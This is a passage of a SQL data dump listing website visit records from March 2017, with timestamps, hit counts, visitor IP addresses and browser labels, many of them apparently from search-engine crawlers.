.255.65.21','other'),(91442,1488540891,1,1,0,0,'130.193.50.34','other'),(91443,1488541489,1,1,0,0,'51.255.65.78','other'),(91444,1488542781,1,1,0,0,'163.172.64.188','other'),(91445,1488542926,1,0,1,0,'66.249.66.183',''),(91446,1488544016,1,1,0,0,'91.196.178.70','chrome'),(91447,1488544676,1,1,0,0,'66.249.66.177','chrome'),(91448,1488544686,1,1,0,0,'66.249.66.84','chrome'),(91449,1488544940,1,1,0,0,'91.196.178.70','chrome'),(91450,1488545478,1,1,0,0,'163.172.64.222','other'),(91451,1488545525,1,1,0,0,'46.211.2.136','chrome'),(91452,1488545740,1,1,0,0,'51.255.65.38','other'),(91453,1488545956,1,1,0,0,'130.193.50.34','other'),(91454,1488545971,1,1,0,0,'141.8.142.58','other'),(91455,1488545978,1,1,0,0,'141.8.183.25','other'),(91456,1488546894,1,1,0,0,'164.132.161.15','other'),(91457,1488546973,1,0,1,0,'66.249.66.177',''),(91458,1488547251,1,1,0,0,'91.196.178.134','firefox'),(91459,1488547929,1,1,0,0,'164.132.161.24','other'),(91460,1488550692,1,1,0,0,'82.145.221.110','chrome'),(91461,1488550799,1,1,0,0,'91.196.178.163','chrome'),(91462,1488551702,1,1,0,0,'91.196.178.72','firefox'),(91463,1488554962,1,1,0,0,'193.194.127.217','firefox'),(91464,1488555341,1,1,0,0,'5.255.253.4','other'),(91465,1488555624,1,1,0,0,'163.172.64.243','other'),(91466,1488555724,1,1,0,0,'180.76.15.5','other'),(91467,1488557941,1,1,0,0,'51.255.65.9','other'),(91468,1488558922,1,1,0,0,'163.172.71.90','other'),(91469,1488560581,1,1,0,0,'91.214.84.160','chrome'),(91470,1488561346,1,1,0,0,'164.132.161.48','other'),(91471,1488561947,1,1,0,0,'91.196.178.36','chrome'),(91472,1488563862,1,1,0,0,'51.255.65.69','other'),(91473,1488564329,1,1,0,0,'51.255.65.53','other'),(91474,1488564470,1,1,0,0,'51.255.65.30','other'),(91475,1488567505,1,1,0,0,'207.46.13.33','other'),(91476,1488568639,1,1,0,0,'178.95.66.236','chrome'),(91477,1488568835,1,1,0,0,'164.132.161.28','other'),(91478,1488570394,1,1,0,0,'51.255.65.35','other'),(91479,1488571491,1,1,0,0,'51.255.65.12','other'),(91480,1488571663,1,1,0,0,'178.92.250.176','firefox'),(91481,1488571925,1,0,1,0,'66.249.66.81',''),(91482,1488572364,1,1,0,0,'51.255.65.46','other'),(91483,1488572376,1,1,0,0,'46.48.13.161','chrome'),(91484,1488572947,1,1,0,0,'164.132.161.71','other'),(91485,1488573572,1,1,0,0,'164.132.161.6','other'),(91486,1488573605,1,1,0,0,'82.145.223.91','other'),(91487,1488574063,1,1,0,0,'46.211.159.83','other'),(91488,1488574744,1,1,0,0,'51.255.65.68','other'),(91489,1488574976,1,1,0,0,'164.132.161.25','other'),(91490,1488576714,1,1,0,0,'164.132.161.8','other'),(91491,1488576967,1,1,0,0,'164.132.161.9','other'),(91492,1488578026,1,1,0,0,'164.132.161.91','other'),(91493,1488578209,1,1,0,0,'164.132.161.10','other'),(91494,1488583222,1,0,1,0,'66.249.66.180',''),(91495,1488585175,1,1,0,0,'164.132.161.9','other'),(91496,1488585858,1,0,1,0,'157.55.39.244',''),(91497,1488586878,1,1,0,0,'164.132.161.35','other'),(91498,1488588540,1,1,0,0,'176.195.118.86','msie'),(91499,1488589584,1,1,0,0,'180.76.15.22','other'),(91500,1488589921,1,1,0,0,'51.255.65.55','other'),(91501,1488590043,1,1,0,0,'163.172.64.246','other'),(91502,1488590056,1,1,0,0,'164.132.161.56','other'),(91503,1488591288,1,1,0,0,'164.132.161.75','other'),(91504,1488592350,1,1,0,0,'51.255.65.96','other'),(91505,1488592812,1,1,0,0,'51.255.65.85','other'),(91506,1488595038,1,1,0,0,'164.132.161.14','other'),(91507,1488595281,2,0,2,0,'68.180.229.99',''),(91508,1488596702,1,1,0,0,'180.76.15.153','other'),(91509,1488597245,1,1,0,0,'163.172.64.236','other'),(91510,1488597383,1,1,0,0,'157.55.39.3','other'),(91511,1488598024,1,0,1,0,'66.249.66.87',''),(91512,1488598685,1,1,0,0,'163.172.64.217','other'),(91513,1488599031,1,1,0,0,'163.172.64.233','other'),(91514,1488600265,1,0,1,0,'66.249.66.177',''),(91515,1488601311,2,2,0,0,'157.55.39.3','other'),(91516,1488601648,1,1,0,0,'164.132.161.72','other'),(91517,1488602381,1,1,0,0,'164.132.161.94','other'),(91518,1488603400,1,1,0,0,'163.172.71.29','other'),(91519,1488603567,23,23,0,0,'94.199.151.22','other'),(91520,1488603624,1,1,0,0,'164.132.161.19','other'),(91521,1488605680,1,1,0,0,'163.172.71.21','other'),(91522,1488607766,1,1,0,0,'164.132.161.65','other'),(91523,1488608075,1,1,0,0,'51.255.65.75','other'),(91524,1488608442,1,1,0,0,'163.172.64.183','other'),(91525,1488608527,1,0,1,0,'66.249.66.183',''),(91526,1488608597,1,1,0,0,'66.249.66.180','chrome'),(91527,1488608750,1,1,0,0,'164.132.161.65','other'),(91528,1488608926,1,1,0,0,'40.77.167.99','other'),(91529,1488609496,1,1,0,0,'63.243.252.55','other'),(91530,1488609630,2,2,0,0,'95.213.141.126','opera'),(91531,1488610623,49,49,0,0,'62.138.8.181','other'),(91532,1488611404,1,0,1,0,'66.249.66.183',''),(91533,1488612373,1,1,0,0,'51.255.65.15','other'),(91534,1488613558,1,1,0,0,'51.255.65.8','other'),(91535,1488613973,1,1,0,0,'164.132.161.28','other'),(91536,1488614823,1,1,0,0,'51.255.65.28','other'),(91537,1488615082,1,1,0,0,'66.249.93.157','chrome'),(91538,1488615761,1,1,0,0,'79.164.61.152','msie'),(91539,1488615914,1,1,0,0,'164.132.161.64','other'),(91540,1488617218,1,1,0,0,'51.255.65.5','other'),(91541,1488618524,1,1,0,0,'66.249.66.183','chrome'),(91542,1488618822,1,1,0,0,'66.249.66.180','chrome'),(91543,1488618825,1,1,0,0,'66.249.66.84','chrome'),(91544,1488619103,1,1,0,0,'95.132.132.229','firefox'),(91545,1488619655,1,1,0,0,'91.196.178.36','chrome'),(91546,1488620050,1,1,0,0,'51.255.65.61','other'),(91547,1488620361,1,1,0,0,'51.255.65.90','other'),(91548,1488620593,1,1,0,0,'163.172.64.183','other'),(91549,1488621257,1,1,0,0,'163.172.64.228','other'),(91550,1488621417,2,2,0,0,'144.76.8.231','other'),(91551,1488621523,1,1,0,0,'164.132.161.83','other'),(91552,1488622152,1,1,0,0,'163.172.64.230','other'),(91553,1488622709,1,1,0,0,'66.249.66.177','chrome'),(91554,1488623264,1,1,0,0,'163.172.64.239','other'),(91555,1488623966,1,1,0,0,'66.249.66.177','chrome'),(91556,1488624036,1,1,0,0,'176.195.111.34','chrome'),(91557,1488626521,1,1,0,0,'163.172.64.226','other'),(91558,1488627273,1,1,0,0,'51.255.65.32','other'),(91559,1488627556,1,1,0,0,'66.249.66.177','chrome'),(91560,1488627558,1,1,0,0,'66.249.66.84','chrome'),(91561,1488629280,1,1,0,0,'207.46.13.78','other'),(91562,1488630581,1,1,0,0,'51.255.65.54','other'),(91563,1488630816,1,1,0,0,'51.255.65.43','other'),(91564,1488631135,1,1,0,0,'5.255.253.67','other'),(91565,1488631246,1,1,0,0,'130.180.216.215','chrome'),(91566,1488631609,1,1,0,0,'164.132.161.5','other'),(91567,1488631819,1,1,0,0,'207.46.13.78','other'),(91568,1488632150,1,1,0,0,'164.132.161.75','other'),(91569,1488632303,1,1,0,0,'51.255.65.45','other'),(91570,1488632919,1,1,0,0,'94.179.47.160','chrome'),(91571,1488633232,1,1,0,0,'93.158.152.40','other'),(91572,1488633236,1,1,0,0,'130.193.50.34','other'),(91573,1488634032,2,2,0,0,'108.59.8.70','other'),(91574,1488634439,1,1,0,0,'51.255.65.45','other'),(91575,1488634868,1,1,0,0,'207.46.13.78','other'),(91576,1488635043,1,1,0,0,'157.55.39.3','other'),(91577,1488635751,1,1,0,0,'66.249.66.84','chrome'),(91578,1488635753,1,1,0,0,'66.249.66.177','chrome'),(91579,1488638021,1,1,0,0,'109.63.162.222','msie'),(91580,1488638443,1,1,0,0,'51.255.65.83','other'),(91581,1488639670,1,1,0,0,'157.55.39.47','other'),(91582,1488640253,1,1,0,0,'51.255.65.11','other'),(91583,1488640951,1,1,0,0,'51.255.65.23','other'),(91584,1488641177,1,1,0,0,'163.172.64.180','other'),(91585,1488642100,1,1,0,0,'157.55.39.3','other'),(91586,1488642683,1,1,0,0,'66.249.66.177','chrome'),(91587,1488642686,1,1,0,0,'66.249.66.81','chrome'),(91588,1488643125,1,1,0,0,'141.8.183.19','other'),(91589,1488643275,1,1,0,0,'157.55.39.136','other'),(91590,1488643397,1,1,0,0,'51.255.65.69','other'),(91591,1488644282,78,2,76,0,'173.208.149.170',''),(91592,1488645207,68,0,68,0,'173.208.149.170',''),(91593,1488645337,1,1,0,0,'91.196.178.66','chrome'),(91594,1488645423,1,1,0,0,'94.179.27.226','firefox'),(91595,1488645512,1,1,0,0,'180.76.15.155','other'),(91596,1488645922,71,71,0,0,'173.208.149.170','msie'),(91597,1488646324,5,5,0,0,'173.208.149.170','firefox'),(91598,1488646499,1,1,0,0,'164.132.161.90','other'),(91599,1488650183,1,1,0,0,'164.132.161.77','other'),(91600,1488650526,1,1,0,0,'91.196.178.99','chrome'),(91601,1488650656,1,1,0,0,'164.132.161.95','other'),(91602,1488651090,1,1,0,0,'51.255.65.30','other'),(91603,1488651412,1,1,0,0,'51.255.65.22','other'),(91604,1488651793,1,1,0,0,'66.249.75.187','chrome'),(91605,1488651796,1,1,0,0,'66.249.69.155','chrome'),(91606,1488652257,1,1,0,0,'164.132.161.19','other'),(91607,1488652366,1,1,0,0,'46.211.159.53','other'),(91608,1488653181,1,1,0,0,'163.172.64.235','other'),(91609,1488655547,1,1,0,0,'94.179.88.32','chrome'),(91610,1488657560,1,1,0,0,'51.255.65.50','other'),(91611,1488657891,1,1,0,0,'164.132.161.52','other'),(91612,1488658214,1,1,0,0,'164.132.161.25','other'),(91613,1488658443,1,1,0,0,'51.255.65.52','other'),(91614,1488659099,1,1,0,0,'164.132.161.72','other'),(91615,1488659213,1,1,0,0,'188.191.239.121','chrome'),(91616,1488659511,1,1,0,0,'51.255.65.59','other'),(91617,1488659878,1,1,0,0,'157.55.39.3','other'),(91618,1488659945,1,1,0,0,'163.172.64.247','other'),(91619,1488660263,1,1,0,0,'157.55.39.136','other'),(91620,1488660551,1,1,0,0,'163.172.64.236','other'),(91621,1488661263,1,1,0,0,'176.195.191.68','opera'),(91622,1488661781,2,1,1,0,'66.249.69.155',''),(91623,1488661786,1,1,0,0,'66.249.75.179','chrome'),(91624,1488662482,2,2,0,0,'157.55.39.47','other'),(91625,1488663952,1,0,1,0,'66.249.69.149',''),(91626,1488664077,1,1,0,0,'164.132.161.15','other'),(91627,1488664943,1,1,0,0,'157.55.39.3','other'),(91628,1488665046,1,1,0,0,'157.55.39.136','other'),(91629,1488665478,1,0,1,0,'66.249.75.183',''),(91630,1488666944,1,1,0,0,'207.46.13.78','other'),(91631,1488667374,1,1,0,0,'163.172.64.243','other'),(91632,1488667408,1,1,0,0,'164.132.161.65','other'),(91633,1488668190,1,0,1,0,'207.46.13.78',''),(91634,1488668478,1,1,0,0,'82.145.220.125','other'),(91635,1488672432,1,1,0,0,'51.255.65.65','other'),(91636,1488673386,1,1,0,0,'163.172.64.249','other'),(91637,1488673627,1,1,0,0,'180.76.15.159','other'),(91638,1488673725,1,0,1,0,'66.249.75.179',''),(91639,1488673747,1,0,1,0,'66.249.75.183',''),(91640,1488673901,1,1,0,0,'164.132.161.70','other'),(91641,1488674992,1,1,0,0,'180.76.15.139','other'),(91642,1488675670,1,1,0,0,'164.132.161.32','other'),(91643,1488676025,1,1,0,0,'141.8.142.67','other'),(91644,1488676375,1,1,0,0,'66.249.75.183','chrome'),(91645,1488676377,1,1,0,0,'66.249.69.155','chrome'),(91646,1488676392,1,1,0,0,'157.55.39.3','other'),(91647,1488677542,1,1,0,0,'157.55.39.47','other'),(91648,1488679215,1,1,0,0,'164.132.161.70','other'),(91649,1488679361,1,1,0,0,'51.255.65.97','other'),(91650,1488680138,1,0,1,0,'66.249.69.155',''),(91651,1488681404,1,1,0,0,'163.172.73.28','other'),(91652,1488682471,1,1,0,0,'51.255.65.50','other'),(91653,1488683317,1,1,0,0,'66.249.69.149','chrome'),(91654,1488683339,1,1,0,0,'66.249.75.187','chrome'),(91655,1488683964,1,1,0,0,'51.255.65.68','other'),(91656,1488684142,1,0,1,0,'207.46.13.78',''),(91657,1488685018,1,1,0,0,'164.132.161.30','other'),(91658,1488686207,1,1,0,0,'51.255.65.86','other'),(91659,1488686248,1,1,0,0,'51.255.65.83','other'),(91660,1488687034,1,1,0,0,'207.46.13.78','other'),(91661,1488687160,1,0,1,0,'157.55.39.136',''),(91662,1488688223,1,0,1,0,'66.249.75.22',''),(91663,1488689656,1,1,0,0,'51.255.65.16','other'),(91664,1488691850,1,0,1,0,'66.249.75.179',''),(91665,1488693048,1,1,0,0,'163.172.64.181','other'),(91666,1488693205,1,1,0,0,'66.249.69.155','chrome'),(91667,1488693209,1,1,0,0,'66.249.75.183','chrome'),(91668,1488693371,1,1,0,0,'46.4.32.75','other'),(91669,1488694378,1,1,0,0,'51.255.65.81','other'),(91670,1488695498,1,0,1,0,'66.249.69.155',''),(91671,1488696058,1,1,0,0,'91.200.12.49','chrome'),(91672,1488697096,1,1,0,0,'164.132.161.57','other'),(91673,1488697346,1,1,0,0,'164.132.161.47','other'),(91674,1488697425,1,1,0,0,'157.55.39.178','other'),(91675,1488697513,1,0,1,0,'66.249.69.149',''),(91676,1488697740,1,1,0,0,'163.172.64.232','other'),(91677,1488697936,1,1,0,0,'164.132.161.79','other'),(91678,1488698121,1,1,0,0,'51.255.65.59','other'),(91679,1488699002,1,1,0,0,'164.132.161.87','other'),(91680,1488699417,1,1,0,0,'66.249.93.157','chrome'),(91681,1488700798,1,1,0,0,'164.132.161.56','other'),(91682,1488701938,1,1,0,0,'108.59.8.80','other'),(91683,1488703056,1,1,0,0,'164.132.161.48','other'),(91684,1488703419,1,1,0,0,'51.255.65.85','other'),(91685,1488704674,1,1,0,0,'51.255.65.58','other'),(91686,1488704758,1,1,0,0,'51.255.65.26','other'),(91687,1488707154,1,1,0,0,'164.132.161.30','other'),(91688,1488707568,1,1,0,0,'51.255.65.44','other'),(91689,1488708409,1,1,0,0,'51.255.65.54','other'),(91690,1488708479,1,1,0,0,'95.134.171.40','chrome'),(91691,1488709100,1,1,0,0,'207.46.13.78','other'),(91692,1488709208,1,1,0,0,'130.193.50.34','other'),(91693,1488709786,1,1,0,0,'51.255.65.69','other'),(91694,1488711792,1,1,0,0,'163.172.64.230','other'),(91695,1488712573,1,1,0,0,'164.132.161.8','other'),(91696,1488712862,1,1,0,0,'164.132.161.75','other'),(91697,1488713837,1,1,0,0,'66.249.75.187','chrome'),(91698,1488713838,1,1,0,0,'66.249.69.155','chrome'),(91699,1488714283,1,1,0,0,'46.48.13.161','chrome'),(91700,1488715085,1,0,1,0,'66.249.75.183',''),(91701,1488715502,1,1,0,0,'164.132.161.80','other'),(91702,1488715693,1,1,0,0,'91.196.178.68','chrome'),(91703,1488715819,2,2,0,0,'81.109.85.9','other'),(91704,1488716680,1,0,1,0,'66.249.69.149',''),(91705,1488719180,1,1,0,0,'157.55.39.178','other'),(91706,1488719640,1,1,0,0,'66.249.69.149','chrome'),(91707,1488719643,1,1,0,0,'66.249.75.179','chrome'),(91708,1488721098,1,1,0,0,'95.132.135.145','chrome'),(91709,1488724196,1,1,0,0,'46.133.93.87','chrome'),(91710,1488725278,1,1,0,0,'51.255.65.92','other'),(91711,1488725312,1,1,0,0,'51.255.65.40','other'),(91712,1488725833,1,1,0,0,'163.172.64.230','other'),(91713,1488727867,1,1,0,0,'164.132.161.81','other'),(91714,1488727873,1,1,0,0,'66.249.75.187','chrome'),(91715,1488727877,1,1,0,0,'66.249.69.149','chrome'),(91716,1488728795,1,1,0,0,'51.255.65.63','other'),(91717,1488728884,1,1,0,0,'157.55.39.174','other'),(91718,1488729127,1,1,0,0,'164.132.161.95','other'),(91719,1488729166,1,1,0,0,'164.132.161.58','other'),(91720,1488731259,1,1,0,0,'91.200.12.49','chrome'),(91721,1488731379,1,0,1,0,'66.249.69.149',''),(91722,1488731442,1,0,1,0,'66.249.69.155',''),(91723,1488732920,1,1,0,0,'37.112.37.78','chrome'),(91724,1488733463,1,1,0,0,'78.111.185.33','chrome'),(91725,1488734122,1,1,0,0,'95.133.238.31','other'),(91726,1488734161,1,1,0,0,'141.8.142.25','other'),(91727,1488734206,2,2,0,0,'66.249.69.155','chrome'),(91728,1488734468,1,1,0,0,'95.132.132.90','chrome'),(91729,1488734670,1,1,0,0,'66.249.75.183','chrome'),(91730,1488735054,1,0,1,0,'66.249.69.60',''),(91731,1488738822,1,1,0,0,'157.55.39.174','other'),(91732,1488739052,1,0,1,0,'66.249.69.56',''),(91733,1488741383,1,1,0,0,'163.172.64.238','other'),(91734,1488741734,1,1,0,0,'164.132.161.39','other'),(91735,1488742199,1,1,0,0,'164.132.161.46','other'),(91736,1488742335,1,1,0,0,'66.249.69.56','chrome'),(91737,1488742338,2,1,1,0,'66.249.69.197',''),(91738,1488743010,1,1,0,0,'82.145.221.5','other'),(91739,1488743422,1,1,0,0,'46.48.13.161','chrome'),(91740,1488743588,1,0,1,0,'66.249.69.210',''),(91741,1488743620,1,1,0,0,'176.9.50.43','chrome'),(91742,1488744470,1,1,0,0,'164.132.161.11','other'),(91743,1488745921,1,0,1,0,'66.249.69.60',''),(91744,1488746095,1,1,0,0,'51.255.65.50','other'),(91745,1488746565,1,1,0,0,'51.255.65.65','other'),(91746,1488746651,1,1,0,0,'51.255.65.95','other'),(91747,1488747090,1,1,0,0,'130.193.50.34','other'),(91748,1488747132,1,1,0,0,'51.255.65.6','other'),(91749,1488747133,1,1,0,0,'51.255.65.58','other'),(91750,1488747349,1,1,0,0,'66.249.69.197','chrome'),(91751,1488747949,1,1,0,0,'207.46.13.78','other'),(91752,1488749453,1,1,0,0,'163.172.71.55','other'),(91753,1488749714,1,1,0,0,'164.132.161.87','other'),(91754,1488750354,1,1,0,0,'207.46.13.163','other'),(91755,1488751804,1,1,0,0,'51.255.65.89','other'),(91756,1488754520,1,1,0,0,'51.255.65.75','other'),(91757,1488754728,1,0,1,0,'66.249.69.56',''),(91758,1488755090,1,1,0,0,'157.55.39.167','other'),(91759,1488755641,1,1,0,0,'164.132.161.97','other'),(91760,1488757393,1,1,0,0,'51.255.65.53','other'),(91761,1488757776,1,0,1,0,'66.249.69.56',''),(91762,1488758580,1,1,0,0,'207.46.13.125','other'),(91763,1488759078,1,1,0,0,'157.55.39.167','other'),(91764,1488760773,1,1,0,0,'66.249.69.202','chrome'),(91765,1488760776,1,1,0,0,'66.249.69.52','chrome'),(91766,1488761239,1,1,0,0,'51.255.65.33','other'),(91767,1488761503,1,1,0,0,'51.255.65.61','other'),(91768,1488762026,1,0,1,0,'66.249.69.56',''),(91769,1488763017,1,1,0,0,'51.255.65.94','other'),(91770,1488763719,1,1,0,0,'163.172.64.223','other'),(91771,1488764206,1,1,0,0,'51.255.65.21','other'),(91772,1488765362,1,1,0,0,'66.249.69.210','chrome'),(91773,1488766789,1,0,1,0,'66.249.69.197',''),(91774,1488768727,1,1,0,0,'180.76.15.32','other'),(91775,1488770179,1,1,0,0,'66.249.69.60','chrome'),(91776,1488770181,1,1,0,0,'66.249.69.210','chrome'),(91777,1488771997,1,1,0,0,'199.58.86.209','other'),(91778,1488774469,1,1,0,0,'163.172.64.226','other'),(91779,1488775905,1,0,1,0,'66.249.69.60',''),(91780,1488776517,1,1,0,0,'157.55.39.174','other'),(91781,1488777887,1,1,0,0,'164.132.161.52','other'),(91782,1488778739,1,1,0,0,'91.196.178.68','firefox'),(91783,1488779110,1,0,1,0,'66.249.69.56',''),(91784,1488779319,1,1,0,0,'66.249.69.202','chrome'),(91785,1488779325,1,1,0,0,'66.249.69.52','chrome'),(91786,1488780913,1,1,0,0,'51.255.65.92','other'),(91787,1488781096,1,1,0,0,'66.249.93.15','chrome'),(91788,1488781493,1,1,0,0,'91.196.178.70','chrome'),(91789,1488782241,1,1,0,0,'93.158.152.46','other'),(91790,1488782676,1,1,0,0,'130.180.217.146','firefox'),(91791,1488783821,1,1,0,0,'37.52.19.92','chrome'),(91792,1488783950,1,1,0,0,'51.255.65.67','other'),(91793,1488784504,1,1,0,0,'91.196.178.68','chrome'),(91794,1488784509,1,1,0,0,'141.8.142.61','other'),(91795,1488784535,1,1,0,0,'66.249.69.210','chrome'),(91796,1488784538,1,1,0,0,'66.249.69.56','chrome'),(91797,1488784569,1,1,0,0,'94.179.56.237','firefox'),(91798,1488786008,1,1,0,0,'207.46.13.125','other'),(91799,1488786251,1,0,1,0,'68.180.229.99',''),(91800,1488786712,1,1,0,0,'78.154.165.136','chrome'),(91801,1488786719,1,1,0,0,'163.172.64.179','other'),(91802,1488787474,1,1,0,0,'93.74.212.147','firefox'),(91803,1488787715,1,1,0,0,'92.112.184.137','chrome'),(91804,1488787722,1,1,0,0,'141.8.142.62','other'),(91805,1488788019,1,1,0,0,'94.179.121.37','chrome'),(91806,1488788344,1,1,0,0,'157.55.39.54','other'),(91807,1488789158,1,0,1,0,'66.249.69.52',''),(91808,1488789215,1,1,0,0,'51.255.65.26','other'),(91809,1488789345,1,1,0,0,'95.132.86.125','firefox'),(91810,1488789482,1,1,0,0,'66.249.69.197','chrome'),(91811,1488789485,1,1,0,0,'66.249.69.60','chrome'),(91812,1488789585,1,1,0,0,'176.14.197.135','msie'),(91813,1488789637,1,1,0,0,'193.194.127.217','firefox'),(91814,1488789750,1,1,0,0,'82.207.38.91','chrome'),(91815,1488789754,1,1,0,0,'78.111.185.251','chrome'),(91816,1488789773,1,1,0,0,'81.30.161.145','firefox'),(91817,1488789925,1,1,0,0,'51.255.65.33','other'),(91818,1488790044,1,1,0,0,'51.255.65.54','other'),(91819,1488790135,1,1,0,0,'163.172.64.184','other'),(91820,1488790553,1,1,0,0,'94.179.7.147','firefox'),(91821,1488790818,1,1,0,0,'91.196.178.72','firefox'),(91822,1488790895,1,1,0,0,'180.76.15.158','other'),(91823,1488791006,1,1,0,0,'95.132.86.125','firefox'),(91824,1488791032,1,1,0,0,'164.132.161.25','other'),(91825,1488791228,1,1,0,0,'193.34.141.56','firefox'),(91826,1488791421,1,1,0,0,'163.172.64.222','other'),(91827,1488791725,2,2,0,0,'178.92.85.54','chrome'),(91828,1488792016,1,1,0,0,'94.178.118.168','chrome'),(91829,1488792334,1,1,0,0,'164.132.161.88','other'),(91830,1488792371,1,1,0,0,'94.179.88.67','chrome'),(91831,1488792718,2,2,0,0,'91.196.178.72','firefox'),(91832,1488793271,1,1,0,0,'91.196.178.70','chrome'),(91833,1488793473,2,2,0,0,'46.201.225.225','chrome'),(91834,1488793624,2,2,0,0,'91.196.178.72','firefox'),(91835,1488794065,1,1,0,0,'91.196.178.65','chrome'),(91836,1488794080,1,1,0,0,'141.8.183.25','other'),(91837,1488794098,1,1,0,0,'109.63.242.112','msie'),(91838,1488794164,1,1,0,0,'94.179.103.245','firefox'),(91839,1488794404,1,1,0,0,'46.211.153.226','chrome'),(91840,1488795006,1,1,0,0,'66.249.69.60','chrome'),(91841,1488795009,1,1,0,0,'66.249.69.202','chrome'),(91842,1488795500,3,3,0,0,'107.150.59.98','other'),(91843,1488795763,1,0,1,0,'66.249.69.56',''),(91844,1488796020,1,1,0,0,'82.207.91.234','firefox'),(91845,1488796310,1,1,0,0,'164.132.161.24','other'),(91846,1488796441,1,1,0,0,'91.196.178.130','firefox'),(91847,1488796465,1,0,1,0,'66.249.69.210',''),(91848,1488796736,1,1,0,0,'207.46.13.125','other'),(91849,1488796886,2,0,2,0,'66.249.69.202',''),(91850,1488797469,1,0,1,0,'66.249.69.56',''),(91851,1488797503,1,1,0,0,'91.196.178.68','chrome'),(91852,1488797575,1,1,0,0,'141.8.142.61','other'),(91853,1488797584,1,1,0,0,'93.158.152.61','other'),(91854,1488798064,1,1,0,0,'91.196.178.167','chrome'),(91855,1488798383,1,1,0,0,'91.196.178.66','chrome'),(91856,1488798597,1,1,0,0,'91.196.177.46','firefox'),(91857,1488799265,2,2,0,0,'91.196.178.72','firefox'),(91858,1488800194,1,1,0,0,'91.196.178.66','chrome'),(91859,1488800399,1,1,0,0,'37.54.76.164','firefox'),(91860,1488802168,1,1,0,0,'195.49.151.99','chrome'),(91861,1488802169,1,1,0,0,'66.249.69.210','chrome'),(91862,1488802173,1,1,0,0,'66.249.69.56','chrome'),(91863,1488802355,1,1,0,0,'94.179.95.171','chrome'),(91864,1488802382,1,1,0,0,'141.8.142.206','other'),(91865,1488803483,1,1,0,0,'51.255.65.66','other'),(91866,1488804298,1,1,0,0,'164.132.161.69','other'),(91867,1488804530,1,1,0,0,'91.196.178.167','chrome'),(91868,1488804575,1,1,0,0,'37.55.206.198','chrome'),(91869,1488804986,1,0,1,0,'66.249.69.210',''),(91870,1488805402,1,1,0,0,'91.196.178.70','firefox'),(91871,1488805484,1,0,1,0,'66.249.69.202',''),(91872,1488805773,1,1,0,0,'78.111.185.244','firefox'),(91873,1488805915,1,1,0,0,'91.196.178.167','chrome'),(91874,1488806428,1,0,1,0,'207.46.13.34',''),(91875,1488806855,1,1,0,0,'91.211.132.52','chrome'),(91876,1488807537,1,1,0,0,'130.180.217.146','firefox'),(91877,1488807838,1,1,0,0,'164.132.161.74','other'),(91878,1488807916,1,1,0,0,'91.196.178.72','firefox'),(91879,1488808099,1,1,0,0,'66.249.69.52','chrome'),(91880,1488808102,1,1,0,0,'66.249.69.210','chrome'),(91881,1488808525,1,1,0,0,'164.132.161.96','other'),(91882,1488809491,1,1,0,0,'91.196.177.46','firefox'),(91883,1488810124,1,1,0,0,'157.55.39.54','other'),(91884,1488810441,1,1,0,0,'176.102.60.232','firefox'),(91885,1488810460,1,1,0,0,'141.8.183.25','other'),(91886,1488810884,1,1,0,0,'217.12.196.146','firefox'),(91887,1488810994,1,1,0,0,'62.212.73.211','other'),(91888,1488811267,1,1,0,0,'66.102.9.27','chrome'),(91889,1488812201,1,1,0,0,'91.196.122.186','chrome'),(91890,1488812366,1,1,0,0,'163.172.64.193','other'),(91891,1488812795,1,1,0,0,'91.196.178.66','firefox'),(91892,1488812840,1,1,0,0,'91.196.177.46','firefox'),(91893,1488813395,1,1,0,0,'164.132.161.20','other'),(91894,1488814116,1,1,0,0,'83.166.243.150','firefox'),(91895,1488814177,1,1,0,0,'51.255.65.63','other'),(91896,1488814574,1,1,0,0,'91.214.84.186','chrome'),(91897,1488814808,1,1,0,0,'91.196.178.33','chrome'),(91898,1488815150,1,1,0,0,'66.249.69.202','chrome'),(91899,1488815151,1,1,0,0,'66.249.69.60','chrome'),(91900,1488815926,1,1,0,0,'51.255.65.13','other'),(91901,1488815937,2,2,0,0,'91.196.178.69','chrome'),(91902,1488815940,1,1,0,0,'46.219.253.56','chrome'),(91903,1488816092,1,1,0,0,'37.52.166.197','chrome'),(91904,1488816521,1,1,0,0,'180.76.15.159','other'),(91905,1488818216,1,1,0,0,'136.243.35.158','other'),(91906,1488818218,1,1,0,0,'136.243.35.158','chrome'),(91907,1488818576,1,0,1,0,'66.249.69.60',''),(91908,1488819861,1,1,0,0,'78.111.190.165','chrome'),(91909,1488820419,1,1,0,0,'66.249.69.56','chrome'),(91910,1488820422,1,1,0,0,'66.249.69.202','chrome'),(91911,1488821656,1,1,0,0,'91.196.178.167','chrome'),(91912,1488822883,1,1,0,0,'66.102.9.25','chrome'),(91913,1488823170,1,0,1,0,'66.249.69.197',''),(91914,1488824504,1,0,1,0,'66.249.69.56',''),(91915,1488825191,1,1,0,0,'163.172.64.234','other'),(91916,1488825287,1,0,1,0,'66.249.69.246',''),(91917,1488827101,1,1,0,0,'51.255.65.27','other'),(91918,1488827560,1,1,0,0,'94.178.71.103','firefox'),(91919,1488827709,1,1,0,0,'51.255.65.12','other'),(91920,1488828074,1,0,1,0,'66.249.69.197',''),(91921,1488828191,1,1,0,0,'66.249.69.202','chrome'),(91922,1488828196,1,1,0,0,'66.249.69.60','chrome'),(91923,1488828562,1,1,0,0,'164.132.161.5','other'),(91924,1488828831,2,2,0,0,'157.55.39.174','other'),(91925,1488830877,2,2,0,0,'94.178.7.138','chrome'),(91926,1488831321,2,2,0,0,'92.112.105.226','chrome'),(91927,1488832281,1,1,0,0,'157.55.39.167','other'),(91928,1488833064,1,1,0,0,'91.124.180.97','chrome'),(91929,1488834004,1,1,0,0,'164.132.161.8','other'),(91930,1488835060,1,0,1,0,'66.249.64.74',''),(91931,1488835211,1,1,0,0,'51.255.65.37','other'),(91932,1488835824,1,1,0,0,'66.249.64.137','chrome'),(91933,1488835828,1,1,0,0,'66.249.64.69','chrome'),(91934,1488835964,1,0,1,0,'66.249.64.142',''),(91935,1488836240,7,7,0,0,'5.9.111.70','other'),(91936,1488836796,1,1,0,0,'157.55.39.156','other'),(91937,1488836892,1,1,0,0,'91.196.178.131','chrome'),(91938,1488837031,1,0,1,0,'66.249.64.132',''),(91939,1488838235,1,1,0,0,'164.132.161.20','other'),(91940,1488838387,1,0,1,0,'66.249.64.137',''),(91941,1488839156,1,1,0,0,'51.255.65.36','other'),(91942,1488839184,1,1,0,0,'46.48.13.161','chrome'),(91943,1488841022,1,0,1,0,'66.249.64.69',''),(91944,1488841477,1,1,0,0,'66.249.64.137','chrome'),(91945,1488842136,1,1,0,0,'109.63.243.89','opera'),(91946,1488843086,1,1,0,0,'130.193.50.6','other'),(91947,1488843906,1,1,0,0,'66.249.64.79','chrome'),(91948,1488845032,1,1,0,0,'164.132.161.4',